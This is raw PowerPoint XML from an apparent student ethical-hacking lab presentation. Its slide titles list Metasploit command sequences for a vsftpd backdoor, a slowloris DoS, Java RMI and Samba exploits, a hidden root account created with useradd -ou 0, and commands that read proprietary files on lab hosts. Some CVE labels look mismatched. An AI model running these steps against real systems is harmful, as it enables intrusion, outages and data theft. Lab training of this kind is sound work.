              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" cap="none" dirty="0"/>
              <a:t>CVE-2007-6750</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3200" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" cap="none" dirty="0"/>
              <a:t>CVSS Score 5.0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none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69C8ED98-069F-FBF1-AB7B-6E7B6C5B6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0321" y="-9524"/>
            <a:ext cx="3994911" cy="502149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28EFEE6-5D3D-60C4-2DA3-370871A9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603" y="3704486"/>
            <a:ext cx="4935437" cy="266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7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E4BE48-C8E8-A59D-B06A-08060E86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sz="2800" cap="none" dirty="0"/>
              <a:t>Command lines:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use auxiliary/dos/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>slowloris</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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show options</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.0.18</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4000" cap="none" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4000" cap="none" dirty="0"/>
            </a:b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685DC6F-CF8E-572E-A372-946707467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898" y="-27169"/>
            <a:ext cx="5570565" cy="7002045"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="505816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8205</TotalTime>
  <Words>446</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>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Project c Ethical Hacking</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Task 1:  Installing the Production Server virtual machine into the trusted network</vt:lpstr>
      <vt:lpstr>Task 2 : Nmap within Kali Linux to enumerate possible vulnerabilities on the Production server</vt:lpstr>
      <vt:lpstr>Task 3 : Nmap within Kali Linux to enumerate possible vulnerabilities on the Web Server</vt:lpstr>
      <vt:lpstr>Task 3:  Exploiting the  Production server using  FTP backdoor and getting root access  CVE-2011-2523    CVSS Score 9.8  </vt:lpstr>
      <vt:lpstr>Command lines:  Search vsftpd  showoptions  Use 0  set rhosts 192.168.0.18  exploit  whoami </vt:lpstr>
      <vt:lpstr>Task 4:  Exploiting the  Production server using a DOS attack  CVE-2007-6750   CVSS Score 5.0   </vt:lpstr>
      <vt:lpstr>Command lines:  use auxiliary/dos/http/slowloris  show options  set rhosts 192.168.0.18  exploit   </vt:lpstr>
      <vt:lpstr>Task 5:  Exploiting the Web server using  JRMI (Java remote method invocation)  CVE -2018-10611   CVSS Score 7.5     </vt:lpstr>
      <vt:lpstr>Command lines:  use exploit/multi/misc/java_ rmi_server_  show options  use 0  set rhosts 10.200.0.12  run   </vt:lpstr>
      <vt:lpstr>Task 5:  Exploiting the Web server with a Samba vulnerable configuration  CVE -2021-44142   CVSS Score 9.9  </vt:lpstr>
      <vt:lpstr>Command lines:  use exploit/multi/samba/usermap_script show options  use 0  set rhosts 10.200.0.12  run  whoami  </vt:lpstr>
      <vt:lpstr>Task 6: Creating an account on the Production Server that has Root permissions</vt:lpstr>
      <vt:lpstr>Command lines  sudo useradd –ou 0 –g0 (username) create password</vt:lpstr>
      <vt:lpstr>Task 7 : Finding interesting files on the Production server </vt:lpstr>
      <vt:lpstr>command lines in the production server  cd/user cd Proprietary cd Formulas ls –al cat Texas </vt:lpstr>
      <vt:lpstr>Task 7 : Finding interesting files on the Web servers </vt:lpstr>
      <vt:lpstr>command lines in the web server server  cd /name-jasper ls –al cat –candidate-list</vt:lpstr>
      <vt:lpstr>Task 9: Recommendations to improve server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 Ethical Hacking</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-22T16:07:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-30T21:33:11Z</dcterms:modified>
</cp:coreProperties>
</file>